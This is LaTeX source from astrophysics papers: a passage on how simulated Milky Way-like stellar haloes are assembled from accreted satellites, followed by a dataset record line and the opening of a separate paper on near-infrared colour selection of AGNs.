$z=1$ are the dominant contributors to the many-progenitor haloes Aq-C
and Aq-D. The extreme case of Aq-F is atypical: more than 95\% of the
halo was contributed by the late merger of an object of stellar mass
greater than the SMC infalling at $z\sim0.7$, which does not
survive. By contrast, the two least massive haloes Aq-B and Aq-E are
built by many less massive accretions at higher redshift, with
surviving satellites making only a minor contribution ($<10\%$). Halo
Aq-A represents an intermediate case, in which stars stripped from a
relatively late-infalling survivor add significantly ($\sim10\%$) to the mass of
a halo predominantly assembled at high redshift. The relative
contributions to the halo of all accretion events are illustrated in
\fig{fig:carlos_contribs}. Each line in this figure indicates the
fraction of the total halo stellar mass that was contributed by
satellites donating less than a given fraction of this total
\textit{individually}. An interesting feature illustrated by this
figure concerns Aq-B, one of our few-progenitor haloes (shown as light
blue in all figures). Although \fig{fig:halogrowth} shows that the
assembly of this halo proceeds over time by a series of concentrated
`jumps' in mass, its final composition is even less biased to the most
significant progenitor than any of the many-progenitor haloes.
In general, surviving contributors to the halo retain less than 5\% of
the total stellar mass that formed in them. A small number of surviving contributors
retain a significant fraction of their mass, for example, the
surviving contributor to Aq-A, which retains 25\%. In
\fig{fig:stripping}, we show histograms of the number of all surviving
satellites (combining all six haloes) that have been stripped of a
given fraction of their mass. Most satellites are either largely
unaffected or almost totally stripped, indicating that the time spent
in an intermediate disrupting state is relatively short.
In \mntab{tbl:summary}, we give the fraction of mass in the stellar
halo that has been stripped from surviving satellites,
$f_{\rm{surv}}$. As previously stated, this contribution is dominant
in haloes Aq-C (67\%) and Aq-D (62\%), significant in Aq-A (7\%) and
Aq-B (4\%) and negligible in Aq-E and Aq-F. Sales {et~al.} (2007b)
find that only $\sim6\%$ of stars in the eight haloes formed in the
SPH simulations of
Abadi {et~al.} (2006) are associated with a surviving satellite. The lack of
surviving satellites may be attributable to the limited resolution of
those simulations; clearly, the number of `survivors' is sensitive to
the lowest mass at which remnant cores can be resolved. However,
Bullock \& Johnston (2005), and the companion study of Font {et~al.} (2006), also
conclude that the contribution of surviving satellites is small
($<10\%$ in all of their 11 haloes and typically $<1\%$). As the
resolution of their simulations is comparable to ours, the
predominance of surviving contributors in two of our haloes is
significant.
Bullock \& Johnston find that their haloes are built from a similar
(small) number of massive objects to ours (e.g. figure 10
of Bullock \& Johnston 2005) with comparable accretion times ($>8$ Gyr), suggesting
that there are no fundamental differences in the infall times and masses
of accreted satellites. Notably, Font {et~al.} (2006) observe that no
satellites accreted $>9$~Gyr ago survive in their subsample of four of
the Bullock \& Johnston haloes, whereas we find that some satellites
infalling even at redshifts $z>2$ may survive (see also
\fig{fig:zinfall_gradient} below). The discrepancy appears to stem from
the greater resilience of satellites accreted at $z>1$ in our models,
including some which contribute significantly to the stellar haloes. In
other words, our model does not predict any \newt{more} late-infalling
contributors \newt{than the models of Bullock \& Johnston}. The more
rapid disruption of massive subhaloes in the Bullock \& Johnston
models may be attributable to one or both of the analytic prescriptions
employed by those authors to model the growth of the dark matter halo
and dynamical friction in the absence of a live halo. It is also
possible that the relation between halo mass and concentration assumed
in the Bullock \& Johnston model results in satellites that are less
concentrated than subhaloes in the Aquarius simulations.
Current observational estimates (e.g. Bell {et~al.} 2008) imply that the
stellar halo of the Milky Way is intermediate in mass between our
haloes Aq-C and Aq-D; if its accretion history is, in fact,
qualitatively similar to these many-progenitor haloes,
\fig{fig:contributions} implies that it is likely to have accreted its
four or five most significant contributors around $z\sim1-3$ in the
form of objects with masses similar to the Fornax or Leo I dwarf
spheroidals. Between one and three of the most recently accreted, and
hence most massive contributors, are expected to retain a surviving
core, and to have a stellar mass comparable to Sagittarius
($M_{\rm{sgr}} \sim 5 \times 10^{8}\,\rm{M_{\sun}}$ or $\sim 50\%$ of
the total\footnote{Both the Sagittarius and Milky Way halo stellar
mass estimates are highly uncertain; it is unclear what contribution
is made by the Sgr debris to estimates of the halo mass, although
both the stream and the Virgo overdensity were masked out in the
analysis of Bell {et~al.} (2008) for which a value of $\sim3\times
10^{8}\,\rm{M_{\sun}}$ in the range $3<r<40\,\rm{kpc}$ was obtained from a
broken power-law fit to the remaining `smooth' halo.} halo mass,
infalling at a lookback time of $\sim5\,\rm{Gyr}$;
Law {et~al.} 2005). It is also possible that the Canis Major
overdensity (with a core luminosity comparable to that of
Sagittarius; Martin {et~al.} 2004) associated with the low-latitude Monoceros
stream (Newberg {et~al.} 2002; Yanny {et~al.} 2003; Ibata {et~al.} 2003) should be
included in the census of `surviving contributors' (although
this association is by no means certain;
e.g. Mateu {et~al.} 2009). Therefore, the picture so far established for the
Milky Way appears to be in qualitative agreement with the presence
of surviving cores from massive stellar halo contributors in our
simulations.
\subsection{Bulk halo properties and observables}
\label{sec:global_haloes}
\subsubsection{Distribution of mass}
\label{sec:distribution}
In \fig{fig:densityprofiles} we show the spherically averaged
density profiles of halo stars (excluding material bound in
surviving satellites, but making no distinction between streams,
tidal tails or other overdensities, and a `smooth' component). The
notable degree of substructure in these profiles contrasts with the
smooth dark matter haloes, which are well-fit by the Einasto
profiles shown in
\fig{fig:densityprofiles}. As discussed further below, this stellar
substructure is due to the contribution of localised, spatially
coherent subcomponents within the haloes, which are well resolved in
our particle representation.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm 0cm]{fig13.eps}
\caption{Spherically averaged density profiles for our six stellar
haloes (shown as thin lines below the $\kappa=7$ radius of
Navarro {et~al.} 2008, at which the circular velocity
of the dark matter halo has converged to an accuracy of 1\%). Arrows
mark the break radii of broken power-law fits to each
profile. Dashed lines show Einasto profile fits to the corresponding
dark matter haloes (Navarro {et~al.} 2008). Grey vertical
lines demarcate our outer halo region (dotted) and the Solar
neighbourhood (solid); coloured vertical bars indicate $r_{200}$ for
the dark haloes. For reference we overplot representative data for
the Milky Way (orange): estimates of the halo density in the Solar
neighbourhood (symbols) from Gould, Flynn \& Bahcall (1998, square) and
Fuchs \& Jahrei{\ss{}} (1998, circle), and the best-fitting broken
power-law of Bell et al. (excluding the Sagittarius stream and Virgo
overdensity).}
\label{fig:densityprofiles}
\end{figure}
The shapes of the density profiles are broadly similar, showing a
strong central concentration and an outer decline considerably steeper
than that of the dark matter. We overplot in \fig{fig:densityprofiles}
an approximation of the Milky Way halo profile (Bell {et~al.} 2008) and
normalization (Fuchs \& Jahrei{\ss{}} 1998; Gould {et~al.} 1998). The gross structure of
our three many-progenitor haloes Aq-A, Aq-C and Aq-D can be fit with
broken power-law profiles having indices similar to the Milky Way
($n\sim-3$) interior to the break. Bell {et~al.} (2008) note that their
best-fitting observational profiles do not fully represent the complex
structure of the halo, even though they mask out known overdensities
(our fits include all halo substructure). Our fits decline somewhat
more steeply than the Bell {et~al.} data beyond their break
radii. We suggest that the Milky Way fit may represent variation at
the level of the fluctuations seen in our profiles, and that an even
steeper decline may be observed with a representative and well-sampled
tracer population to $>100$ kpc (For example, Ivezi{\'c} {et~al.} 2000, find a sharp
decline in counts of RR Lyr stars beyond $\sim60$~kpc). In
contrast with the many-progenitor haloes, two of our few-progenitor
haloes (Aq-B and Aq-E) have consistently steeper profiles and show no
obvious break. Their densities in the Solar shell are \newt{none the
less} comparable to the many-progenitor haloes. Aq-F is dominated by
a single progenitor, the debris of which retains a high degree of
unmixed structure at $z=0$ (see also \fig{fig:deposition_profile}).
We show projected surface brightness profiles in
\fig{fig:radialprofiles}. As with their three-dimensional
counterparts, two characteristic shapes distinguish the many- and
few-progenitor haloes. The few-progenitor haloes are centrally
concentrated and well fit in their innermost $\sim10\,\rm{kpc}$ by
Sersic profiles with $1.5<n<2.2$. Beyond $10\,\rm{kpc}$, extended
profiles with a more gradual rollover (described by Sersic profiles
with $n\sim1$ and $25<r_{\rm{eff}}<35$ kpc) are a better fit to the
many-progenitor haloes. In their centres, however, the many-progenitor
haloes display a steep central inflection in surface brightness. As a
consequence of these complex profiles, Sersic fits over the entire
halo region (which we defined to begin at 3~kpc) are not fully
representative in either case. To illustrate this broad dichotomy in
\fig{fig:radialprofiles}, Sersic fits to a smoothly growing halo
(Aq-C) \textit{beyond} 10~kpc and a few-progenitor halo (Aq-E)
\textit{interior to} 10~kpc are shown. Abadi {et~al.} (2006) found the
average of their simulated stellar haloes to be well-fit by a Sersic
profile ($n=6.3,\,r_{eff}=7.7\,$~kpc) in the radial range
$30<r<130$~kpc, \newt{which we} show as an orange dashed line
in \fig{fig:radialprofiles}. This profile is close to the `mean'
profile of our halos A, C and D interior to $30$~kpc (neglecting the
significant fluctuations and inflections within each individual halo
in \fig{fig:radialprofiles}), but does not capture the sharp decline
of our haloes at radii beyond 150~kpc. \fig{fig:radialprofiles} also
shows (as dashed grey lines) the fits of Ibata {et~al.} (2007) to the haloes
of M31 (comprising an $r^{1/4}$ spheroid and shallow powerlaw tail at
large radii) and M33 (powerlaw tail only).
\begin{figure}
\includegraphics[width=84mm]{fig14.eps}
\caption{Radially averaged surface brightness profiles. Dashed lines
show illustrative Sersic fits to haloes Aq-E and Aq-C (see text),
with arrows indicating the corresponding scale radii. We show
sections of equivalent profiles for the haloes of M31 (including the
inner $r^{1/4}$ `spheroid') and M33 (beyond 10~kpc) as dashed grey
lines (Ibata {et~al.} 2007). We overplot the surface number density
(right-hand axis) of globular clusters in M31 (yellow squares) and
the Milky Way (orange squares), with 40 and 10 clusters per bin,
respectively. These profiles have been arbitrarily normalized to
correspond to an estimate of the surface brightness of halo stars in
the Solar neighbourhood from Morrison (1993), shown by a
orange triangle. Vertical lines are as in \fig{fig:densityprofiles}}
\label{fig:radialprofiles}
\end{figure}
There is evidence for multiple kinematic and chemical subdivisions
within the Galactic globular cluster population (e.g. Searle \& Zinn 1978; Frenk \& White 1980; Zinn 1993; Mackey \& Gilmore 2004, and
refs. therein). This has led
to suggestions that at least some of these cluster subsets may have
originated in accreted satellites
(Bellazzini, Ferraro \& Ibata 2003; Mackey \& Gilmore 2004; Forbes, Strader, \& Brodie 2004). Support for this conclusion
includes the presence of five globular clusters in the Fornax dwarf
spheroidal (Hodge 1961) and the association of several Galactic
clusters with the Sagittarius nucleus and debris
(e.g. Layden \& Sarajedini 2000; Newberg {et~al.} 2003; Bellazzini {et~al.} 2003). Similarities with the
`structural' properties of stellar populations in the halo have
motivated a longstanding interpretation of globular clusters as halo
(i.e. accretion debris) tracers (e.g. Lynden-Bell \& Lynden-Bell 1995). We
therefore plot in \fig{fig:radialprofiles} the surface density profile
of globular clusters in the Milky Way (Harris 1996) and M31
(confirmed GCs in the Revised Bologna Catalogue -- RBC v3.5,
March 2008 Galleti {et~al.} 2004, 2006, 2007; Kim {et~al.} 2007; Huxor {et~al.} 2008). The Milky Way data have
been projected along an arbitrary axis, and the normalization has been
chosen to match the surface density of Milky Way clusters to an
estimate of the surface brightness of halo stars in the Solar
neighbourhood ($\mu_{V}=27.7\,\rm{mag/arcsec^2}$;
Morrison 1993). We caution that the RBC incorporates data from
ongoing surveys as it becomes available: the M31 GC profile shown here
is therefore substantially incomplete, particularly with regard to the
sky area covered beyond $\sim20$--30~kpc.
Abadi {et~al.} (2006) showed that their average stellar halo Sersic fit also
approximates the distribution of globular clusters in the Milky Way
and M31. As stated above, the inner regions of our haloes Aq-A, Aq-C
and Aq-D are in broad agreement with the Abadi {et~al.} halo
profile, and hence show some similarities with the observed globular
cluster profiles also. Both the halo and cluster samples show strong
variations from halo to halo, however, and the comparison of these
small samples is inconclusive. A close correspondence between accreted
halo stars and globular clusters would be expected only if the
majority of clusters are accreted, if accreted satellites contribute a
number of clusters proportionate to their stellar mass, and if all
stripped clusters have an equal probability of surviving to
$z=0$. None of these assumptions is realistic, and further work is
required better to constrain the relationship between globular
clusters and stellar haloes.
The multicomponent nature of our haloes, which gives rise to the local
structure in their overall profiles, is examined in more detail in
\fig{fig:deposition_profile}. Here the density profiles of the major
contributors shown in \fig{fig:contributions} are plotted
individually (progenitors contributing $<5\%$ of the halo have been
added to the panel for Aq-F). It is clear from these profiles that
material from a given progenitor can be deposited over a wide range
of radii. The few-progenitor haloes show strong gradients in $\rho
r^2$ while more uniform distributions of this quantity are seen in
their sub-dominant contributors and in most contributors to the
many-progenitor haloes.
\begin{figure}
\includegraphics[]{fig15.eps}
\caption{Individual density profiles (multiplied by $r^2$) for stars
contributed by each of the most significant progenitors of the
halo (defined in \mnsec{sec:defining_haloes}). Line types indicate
the rank order of a progenitor contribution: the bold coloured
line in each panel indicates the most significant contributor,
while lesser contributions are shown by increasingly lighter and
thinner lines. Vertical solid and dashed lines indicate the Solar
shell and virial radius respectively, as
\fig{fig:densityprofiles}. Individual stellar halo components
contribute over a wide radial range, and different components
`dominate' at particular radii. This figure can be used to
interpret the radial trends shown in other figures.}
\label{fig:deposition_profile}
\end{figure}
Finally, we show in \fig{fig:zinfall_gradient} the time at which the
satellite progenitors of halo stars at a given radius were accreted
(this infall time is distinct from the time at which the stars
themselves were stripped, which may be considerably later). An
analogous infall time can be defined for the surviving satellites,
which are shown as points in
\fig{fig:zinfall_gradient}. \newt{W}e would expect
little information to be encoded in an instantaneous sample of the
radii of surviving satellites, \newt{but} their infall times can none
the less be usefully compared with those of halo stars.
\begin{figure}
\includegraphics[]{fig16.eps}
\caption{Lines show, for halo stars at a given radius at $z=0$, the
mean (solid), median and 10/90th percentile (dotted) redshift at
which their parent galaxy was accreted on to the main halo
(\textit{not} the time at which the stars themselves were
stripped). Filled circles show the redshift at which surviving satellites
were accreted; triangles indicate satellites accreted before
$z=7$. Within the solar shell, the stellar halo is typically old in
this `dynamical' sense, whereas beyond 100 kpc its young `dynamical'
age is comparable to that of the surviving satellite population. In
many cases the innermost satellites represent a relic population
that is `older' than the stellar halo at comparable radii.}
\label{fig:zinfall_gradient}
\end{figure}
A gradient to earlier infall times with decreasing radius is apparent
in both the satellites and the many-progenitor haloes. In the case
of the haloes, this reflects the fact that relatively larger apocentres
are associated with later-infalling satellites, which enable them to
deposit material over a greater radial range. Assembly in this manner
is arguably not adequately characterised as `inside out' formation;
late infalling material is added at all radii but has a greater
maximum extent than earlier-infalling material. The result is that
earlier-infalling material comes to \textit{dominate} towards the
centre. For the few-progenitor haloes the profile of infall time is
essentially flat (or shows sharp transitions between populations),
more closely reflecting the contributions of individual progenitors.
Further to our discussion of satellite survival in our haloes in
\mnsec{sec:assembly}, it is interesting that amongst the surviving
satellites, we observe several accreted at $z>1$. For example, in
the case of Aq-E, six surviving satellites are accreted at
$z\sim3.5$; at the present day this group is found in association
with a concentration of halo stars from a stellar halo progenitor
also infalling at this time. The majority of survivors in each halo
are accreted recently, however, and typically more recently than the
stellar halo progenitors. The opposite is true for the
earliest-accreted survivors, which are accreted earlier than the
halo at the notably small radii at which they are now found. In
general, at any given instant the majority of satellites are more
likely to be located nearer to the apocentre of their orbit than the
pericentre; furthermore, the orbits of the most massive satellites
are likely to have been more circular than their disrupted siblings
and dynamical friction may act to reinforce such a trend. Therefore,
the locations of early-infalling survivors are likely to be fairly
represented by their radius in \fig{fig:zinfall_gradient}. Dynamical
friction acts to contract but also to circularize orbits. Plausibly
these survivors are those that have sunk slowly as the result of
their initially low orbital eccentricities.
\subsubsection{Stellar populations}
\label{sec:stellarpops}
In this section, we show how the multicomponent nature of our stellar
haloes is reflected in their metallicity profiles, and contrast the
stellar populations of surviving satellites with those of halo
progenitors. We caution that a full comparison of the relationship
between the stellar halo and surviving satellites will require more
sophisticated modelling of the chemical enrichment process than is
included in our fiducial model, which adopts the instantaneous
recycling approximation and does not follow individual elemental
abundances. We will address this detailed chemical modelling and
\newt{related observational comparisons} in a subsequent
paper (De Lucia et al. in prep.). The model we adopt here tracks only
total metallicity, defined as the total mass fraction of all metals
relative to the Solar value, $Z/\rm{Z_{\sun}}$ (the absolute value of
which cannot be compared directly with measurements of \feh{}). This
model can nevertheless address the \textit{relative} enrichment
levels of different populations.
\fig{fig:metal_gradient} shows the spherically averaged metallicity
gradient in each halo. Our many-progenitor haloes are characterised by
a metallicity distribution of width $\sim1$ dex and approximately
constant mean value, fluctuating by less than $\pm0.5$ dex over a
range of 100~kpc. This is comparable to observations of the M31 halo,
which show no significant gradient (metallicities varying by $\pm0.14$
dex) in the range 30--60~kpc (Richardson {et~al.} 2009). Localised structure
is most apparent in the few-progenitor haloes: Aq-F shows a clear
separation into two components, while Aq-B and Aq-E exhibit global
trends of outwardly declining metallicity gradients. In all cases the
mean metallicity within the Solar radius is relatively high. These
features can be explained by examining the relative weighting of
contributions from individual progenitors at a given radius, as shown
in the density profiles of \fig{fig:deposition_profile}, bearing in
mind the mass-metallicity relation for satellites that arises in our
model. Where massive progenitors make a significant
luminosity-weighted contribution, the haloes are seen to be
metal-rich. Overall, metallicity gradients are shallower in those
haloes where many significant progenitors make a comparable
contribution, smoothing the distribution over the extent of the
halo. Conversely, metallicity gradients are steeper where only one or
two disproportionately massive satellites make contributions to the
halo (as indicated by the luminosity functions of
\fig{fig:victim_vs_survivor_lf}). Sharp contrasts are created between
the radii over which this metal-rich material is deposited (massive
satellites suffer stronger dynamical friction and sink more rapidly,
favouring their concentration at the centres of haloes) and a
background of metal-poor material from less massive halo
progenitors. This effect is clearly illustrated by the sharp
transition in Aq-F and at two locations (centrally and at
$\sim100\,\rm{kpc}$) in Aq-E.
\begin{figure}
\includegraphics[width=84mm]{fig17.eps}
\caption{Radial profiles of luminosity-weighted metallicity (ratio of
total metal mass fraction to the Solar value) for spherical shells
in our six haloes, showing the mean (solid) and median
(thick dotted) profiles, bracketed by the 10th and 90th
percentiles (dotted).}
\label{fig:metal_gradient}
\end{figure}
It follows that the process by which our smooth haloes are
assembled, which gives rise to the steep gradients of progenitor
infall time with redshift shown in \fig{fig:zinfall_gradient}, also
acts to \textit{erase} metallicity gradients. As a result,
measurements of (for example) \feh{} alone do not constrain the local
infall time; a metal-poor halo need not be `old' in the sense of early
assembly. A particularly notable example of this is Aq-E, where the
centrally dominant metal-rich material was assembled into the halo
considerably \textit{earlier} ($z\sim3$) than the diffuse outer
envelope of relatively metal-poor material ($z\sim1$). This is a
manifestation of a mass-metallicity relation in satellites: at fixed
luminosity, an earlier infall time is `compensated' for by more rapid
star formation, resulting in a comparable degree of overall enrichment
as that for a satellite with similar luminosity infalling at lower
redshift. Abundance ratios such as \afe{} indicate the time taken by a
given stellar population to reach its observed level of enrichment,
and so distinguish between rapidly forming massive populations,
truncated by early accretion to the halo, and populations reaching
similar mass and metallicity through gradual star formation
(e.g. Shetrone, C{\^{o}}t{\'{e}} \& Sargent 2001; Tolstoy {et~al.} 2003; Venn {et~al.} 2004; Robertson {et~al.} 2005).
\fig{fig:mdfs} shows luminosity-weighted metallicity distribution
functions (MDFs) for two selections of halo stars: a `Solar shell'
($5<r<12\,\rm{kpc}$; dashed lines) and the entire halo as defined in
\mnsec{sec:defining_haloes} (dotted). We compare these to MDFs for
stars in the surviving satellites in each halo, separating bright
($M_{\rm{V}} < -10$, $r < 280\,\rm{kpc};$ thick, coloured) and
`faint' ($-10<M_{\rm{V}}<-5$; thin, grey) subsets. All distributions
are normalized individually to the total luminosity in their sample
of stars.
\begin{figure}
\includegraphics[clip=True, trim=0mm 0cm 0cm 0cm]{fig18.eps}
\caption{Metallicity distribution functions of bright ($M_{\rm{V}} <
-10$; solid coloured) and faint ($-10<M_{\rm{V}} < -5$; solid grey)
satellites, halo stars in the `Solar shell' (dashed) and the entire
halo ($3<r<280\;\rm{kpc}$, dotted). $Z$ is the total mass fraction
of all metals.}
\label{fig:mdfs}
\end{figure}
The MDF of Solar-shell halo stars is typically broad, and tends to
peak at slightly higher metallicity (by $<0.5$ dex) than the
aggregated surviving bright satellites. The halo as a whole is
comparable to the Solar shell. A clear disparity is only evident in
Aq-E, where the halo appears to reflect more closely the distribution
of fainter, lower-metallicity satellites. In all cases, the MDF of
these faint satellites peaks at considerably lower metallicity than in
the halo or brighter satellites. \movt{We find that the `average'
halo has an equivalent number of very metal-poor stars to the
surviving bright satellites, although there are clear exceptions in
individual cases. The fainter satellites have a substantially
greater fraction of very metal-poor stars, in accordance with their
low mean metallicities. Surviving satellites contain a greater
fraction of moderately metal-poor stars
($\log_{10}(Z/\rm{Z_{\sun}})<-2.5$) than the halo.}
\movt{Our halo models suggest that similar numbers of
comparably luminous (and hence metal-rich) satellites contribute to
the bright end of both the halo-progenitor and the
surviving-satellite luminosity functions, and that these bright
satellites are the dominant contributors to the halo. This supports
the view that halo MDFs should resemble those of bright survivor
satellites in their metal-poor tails. At very low metallicities the
halo is dominated by the contribution of low-luminosity satellites
which are exclusively metal-poor; the stars associated with these
faint contributors are expected to represent only a very small
fraction of the total halo luminosity.}
Finally, \fig{fig:agedistribution} compares the luminosity-weighted
age distributions of halo stars in the Solar shell with those in the
surviving satellites ($M_{\rm{V}} < -5$), separated into bright and
faint subsets. \newt{The
average of all six haloes} contains essentially no stars younger
than 5~Gyr (if we exclude halo Aq-F, which is strongly influenced by
the late accretion of an SMC-like object, this minimum age rises to
8~Gyr). The median age of halo stars is $\sim11$ Gyr. By contrast, the
brightest satellites have a median age of $\sim8$ Gyr and a
substantial tail to young ages (with $\sim20\%$ younger than 4 Gyr and
$\sim90\%$ younger than the median halo age). The distribution of old
stars in the faintest surviving satellites is similar to that of the
halo.
\begin{figure}
\includegraphics[width=84mm,clip=True, trim=0mm 0cm 0cm 0cm]{fig19.eps}
\caption{The cumulative luminosity-weighted age distribution
\newt{(mean of all six simulations)} for halo stars in the Solar
shell (\newt{$5 < r < 12$ kpc, }orange, top \newt{panel}) compared
to bright (\newt{$-15 <M_{\rm{V}} < -10$; } light green, bottom) and
faint (\newt{$-10 < M_{\rm{V}} < -5$; }dark green, centre)
satellites ($M_{\rm{V}} < -10$), showing individual contributions
from each halo (dashed\newt{, colours as in previous figures})
\newt{to the mean value represented by} each panel. The
total stellar masses of these three components over all haloes are
$1.04\times10^{9}$, $7.45\times10^{8}$ and
$3.45\times10^{8}\,\rm{M_{\sun}}$, respectively. }
\label{fig:agedistribution}
\end{figure}
The true age distribution of halo stars is poorly constrained in
comparison to that of the satellites
(e.g. Tolstoy, Hill \& Tosi 2009). By comparing the colour and
metallicity distributions of Milky Way halo stars to those of the
Carina dSph, Unavane, Wyse \& Gilmore (1996) have argued that similar satellites
(i.e. those with a substantial fraction of intermediate-age stars)
could not contribute more than $\sim1\%$ to the halo (equivalent to a
maximum of $\sim60$ halo progenitors of Carina's luminosity). A
corresponding limit of $\leq6$ Fornax-like accretions in the last
$\sim10$ Gyr was derived from an analysis of higher metallicity stars
by the same authors, consistent with the progenitor populations of our
simulated stellar haloes.
It is important in this context that the satellites themselves form
hierarchically. In our models, between ten and twenty progenitors
are typical for a (surviving) galaxy of stellar mass comparable to
Sagittarius, or five to ten for a Fornax analogue. Satellites in
this mass range are the most significant contributors to our stellar
haloes. Their composite nature is likely to be reflected in their
stellar population mix and physical structure, which could
complicate attempts to understand the halo `building blocks' and the
surviving satellites in terms of simple relationships between mass,
age and metallicity.
\section{Conclusions}
\label{sec:conclusion}
We have presented a technique for extracting information on the spatial
and kinematic properties of galactic stellar haloes that combines a very
high resolution fully cosmological \lcdm{} simulation with a
semi-analytic model of galaxy formation. We have applied this technique
to six simulations of isolated dark matter haloes similar to or slightly
less massive than that of the Milky Way, adopting a fiducial set
of paramter values in the semi-analytic model \galform{}. The
structural properties of the surviving satellites have been used as a
constraint on the assignment of stellar populations to dark matter. We
found that this technique results in satellite populations and stellar
haloes in broad agreement with observations of the Milky Way and M31, if
allowance is made for differences in dark halo mass.
Our method of assigning stellar populations to dark matter particles
is, of course, a highly simplified approach to modelling star
formation and stellar dynamics. The nature of star formation in
dwarf galaxy haloes remains largely uncertain. In future,
observations of satellites interpreted alongside high-resolution
hydrodynamical simulations will test the validity of approaches such
as ours. As a further simplification, our models do not account for
a likely additional contribution to the halo from scattered {\em in
situ} (disc) stars, although we expect this contribution to be
minimal far from the bulge and the disc plane. The results outlined
here therefore address the history, structure and stellar
populations of the accreted halo component in isolation.
Our results can be summarised as follows:
\begin{itemize}
\item Our six stellar haloes are predominantly built by satellite
accretion events occurring between $1<z<3$. They span a
range of assembly histories, from
`smooth' growth (with a number of roughly equally massive
progenitors accreted steadily over a Hubble time) to growth in one
or two discrete events.
\item Stellar haloes in our model are typically built from fewer than
5 significant contributors. These significant objects have stellar
masses comparable to the brightest classical dwarf spheroidals of
the Milky Way; by contrast, fewer faint satellites contribute to the
halo than are present in the surviving population.
\item Typically, the most massive halo contributor is accreted at a
lookback time of between 7 and 11 Gyr ($z\sim1.5-3$) and deposits
tidal debris over a wide radial range, dominating the contribution
at large radii. Stars stripped from progenitors accreted at even
earlier times usually dominate closer to the centre of the halo.
\item A significant fraction of the stellar halo consists of stars
stripped from individual \textit{surviving} galaxies, contrary to
expectations from previous studies (e.g. Bullock \& Johnston 2005). It
is the most recent (and significant) contributors that are likely
to be identifiable as surviving bound cores. Such objects have
typically lost $\sim90\%$ of their original stellar mass.
\item We find approximately power-law density profiles for the
stellar haloes in the range $10<r<100$ kpc. Those haloes formed by a
superposition of several comparably massive progenitors have slopes
similar to those suggested for the Milky Way and M31 haloes, while
those dominated by a disproportionally massive progenitor have
steeper slopes.
\item Our haloes have strongly prolate distributions of stellar mass
in their inner regions ($c/a\sim0.3$), with one exception, where an
oblate, disc-like structure dominates the inner $10-20$ kpc.
\item Haloes with several significant progenitors show little or no
radial variation in their mean metallicity ($Z/\mathrm{Z_{\sun}}$)
up to 200~kpc. Those \newt{in which} a small number of progenitors
dominate show stronger metallicity gradients over their full extent
or sharp transitions between regions of different metallicity. The
centres of these haloes are typically more enriched than their outer
regions.
\item The stellar populations of the halo are likely to be chemically
enriched to a level comparable to that of the bright surviving
satellites, but to be as old as the more metal-poor surviving `ultra
faint' galaxies. The very metal-poor tail of the halo distribution
is dominated by contributions from a plethora of faint galaxies that
are insignificant contributors to the halo overall.
\end{itemize}
\section*{Acknowledgments}
The simulations for the Aquarius Project were carried out at the
Leibniz Computing Centre, Garching, Germany, at the Computing Centre
of the Max-Planck-Society in Garching, at the Institute for
Computational Cosmology in Durham, and on the `STELLA' supercomputer
of the LOFAR experiment at the University of Groningen.
APC is supported by an STFC postgraduate studentship, acknowledges
support from the Royal Astronomical Society and Institute of Physics,
and thanks the KITP, Santa Barbara, for hospitality during the early
stages of this work. He also thanks \newt{Annette Ferguson for helpful
comments and} Ben Lowing for code to calculate ellipsoidal fits to
particle distributions. CSF acknowledges a Royal Society Wolfson
Research Merit Award. AH acknowledges support from a VIDI grant by
Netherlands Organisation for Scientific Research (NWO). AJB
acknowledges the support of the Gordon \& Betty Moore foundation. JW
acknowledges a Royal Society Newton Fellowship. GDL acknowledges
financial support from the European Research Council under the
European Community's Seventh Framework Programme (FP7/2007-2013)/ERC
grant agreement n.~202781. \newt{We thank the referee for their
suggestions, which improved the presentation and clarity of the
paper.}
{} | 2024-02-18T23:40:04.741Z | 2010-04-15T02:01:36.000Z | algebraic_stack_train_0000 | 1,258 | 18,885 |
|
proofpile-arXiv_065-6241 | \section{Introduction}
Active Galactic Nuclei (AGNs) are tremendous energetic sources,
where vast amounts of energy are generated
by gravitational accretion around supermassive black hole.
The radiation at nearly all wavelengths enables us to detect AGNs in multiwavelength observations.
Hence, AGNs have been studied at various wavelengths.
Past studies show that their Spectral Energy Distributions (SEDs) are
roughly represented by a power-law (i.e., $f_\nu \propto \nu^{-\alpha}$),
whilst normal galaxies produce an SED that peaks at $\sim 1.6 \mu$m
as the composite blackbody spectra of the stellar population.
Because the colours of an object provide us with rough but essential information about its spectrum,
colours are important clues to identify AGNs from normal stars.
Colour selection is an efficient technique to distinguish AGNs from normal stars and
have played an important role to extract AGN candidates without spectral observation.
A classic method is known as the $UV$-excess \citep[$UVX$; ][]{Sandage1965-ApJ,Schmidt1983-ApJ,Boyle1990-MNRAS}.
The $UVX$ technique exploits the fact that quasars are relatively brighter than stars at shorter wavelength
and therefore occupy a bluer locus in a CCD with respect to stars.
In addition, many AGN candidates have been selected on the basis of colours in various wavelengths:
optical \citep{Richards2002-AJ},
optical and near-infrared \citep{Glikman2007-ApJ}, and
mid-infrared \citep{Lacy2004-ApJS,Stern2005-ApJ}.
These studies provide us with clues about the properties of AGNs.
Target selection of high redshift quasars has also been performed
using their colours, mainly in optical wavelengths
\citep[e.g., ][]{Fan2000-AJ,Fan2001-AJ,Fan2003-AJ}.
However, near-infrared properties are required
when we try to select targets such as higher redshift quasars,
since the shift of the Lyman break to longer wavelengths makes
observations difficult at optical wavelengths.
Therefore, near-infrared selection should be useful technique to extract high-redshift quasars.
In this paper, we present a study of the near-infrared colours of AGNs
and demonstrate, by both observed and simulated colours, that
the near-infrared colours can separate AGNs from normal stars.
Additionally, we predict near-infrared colour evolution based on a Monte-Carlo simulation.
In Sect. \ref{Data}, we introduce the catalogues of AGNs
which are used in order to investigate the observed colours.
We confirm the near-infrared properties of spectroscopically confirmed AGNs
on the basis of the near-infrared CCD and
redshift-colour relations in Sect. \ref{Properties}.
In Sect. \ref{Simulation}, we simulate the near-infrared colours
using Hyperz code developed by \citet{Bolzonella2000-AA} and
demonstrate that AGNs reside in a distinct position in the near-infrared CCD.
In Sect. \ref{Discussion}, we consider the other probable objects
which are expected to have near-infrared colours similar to those of AGNs.
\if2
\begin{figure*}[t]
\begin{tabular}{cc}
(a) & (b) \\
\begin{minipage}[tbp]{0.5\textwidth}
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/qso-agn12-ccd.eps}}
\end{center}
\end{minipage}
&
\begin{minipage}[htbp]{0.5\textwidth}
\begin{center}
\resizebox{90mm}{!}{\includegraphics[clip]{figure/sdss-qso-ccd.eps}}
\end{center}
\end{minipage}
\end{tabular}
\caption{(a) The distribution of AGNs in QA catalogue.
(b) The distribution of quasars in SQ catalogue.
The stellar locus in \citet{Bessell1988-PASP} and
